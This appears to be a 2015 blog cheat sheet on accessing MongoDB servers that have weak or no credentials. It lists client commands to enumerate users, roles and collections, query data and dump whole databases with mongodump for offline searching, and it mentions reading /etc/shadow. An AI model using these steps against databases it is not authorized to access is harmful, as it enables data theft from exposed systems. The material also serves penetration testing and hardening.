Thursday, July 2, 2015

Intro to Hacking Mongo DB

By Tony Lee


Introduction

There is a plethora of literature on hacking SQL databases.  This means going from database access to OS level execution or shells.  However there seems to be a shortage of information on hacking no-sql databases such as Mongo DB.  This article will hopefully help others get a jump start when they run into a Mongo database with weak or no credentials (yes it has happened).  It does not list all possibilities and is only meant to be a cheat sheet.  Feel free to list your favorite commands as well as tips and tricks in the comment section below.


Install mongo client on Kali:

apt-get install mongodb-clients


Connect to DB:

mongo --port <port> -u <username> -p <password> <IP>
Note:  Port 27017 is default value

ex:  mongo -u foo -p bar 10.10.10.10


Show server info:

db.adminCommand( { "hostInfo" : 1 } )
ex: db.adminCommand( { "hostInfo" : 1 } )
{
"system" : {
"currentTime" : ISODate("2014-03-01T14:47:54.379Z"),
"hostname" : "AwesomePC",
"cpuAddrSize" : 64,
"memSizeMB" : 1002,
"numCores" : 2,
"cpuArch" : "x86_64",
"numaEnabled" : false
},
"os" : {
"type" : "Linux",
"name" : "PRETTY_NAME=\"Debian GNU/Linux 7 (wheezy)\"",
"version" : "Kernel 3.2.0-4-amd64"
},
"extra" : {
"versionString" : "Linux version 3.2.0-4-amd64 (debian-kernel@lists.debian.org) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.63-2+deb7u1",
"libcVersion" : "2.13",
"kernelVersion" : "3.2.0-4-amd64",
"cpuFrequencyMHz" : "2266.747",
},
"ok" : 1
}


Show users:

show users
-or-
db.runCommand( { usersInfo: 1 } )

ex:  show users


Show roles:

show roles

ex:  show roles


Show databases:

show dbs

ex:  show dbs
SecretDB  (size of DB)
AwesomeDB (size of DB)
EmptyDB   (empty)


Use database:

use <db_name>

ex:  use SecretDB


Show tables (called collections):

show tables
-or-
show collections
-or-
db.getCollctionNames()

ex: show tables
fluffy
users


List data in the table/collection:

db.<table_name>.find()

ex:  db.users.find()

Note:  by default, it will only display one page

Can also set limit with:
db.<table_name>.find().limit(#)

ex:  db.users.find().limit(5)


Search for exact match in the table/collection:

db.<collection_name>.find( { <column_name> : "<value>" } )

ex:  db.users.find( { name : "Tony" } )


Wildcard search data in the table/collection:

db.<collection_name>.find( { <column_name> : /<value>/i } )

Note:  the i at the end of the /, makes the search case insensitive

ex:  db.users.find( { name : /tony/i } )


Dump the DB for off-line grepping:

mongodump -u <user> -p <pass> -h <IP> --db <db_name>

ex:  mongodump -u foo -p bar -h 10.10.10.10 --db SecretDB

Note:  Results are dumped to:  dump/<db_name>/<collection_name>.bson


Logout:

logout




CAVEATS:

The cat command reads your own files, not the remote system's files
ex:  cat ("/etc/shadow") is your own shadow file :(  Bummer, I know!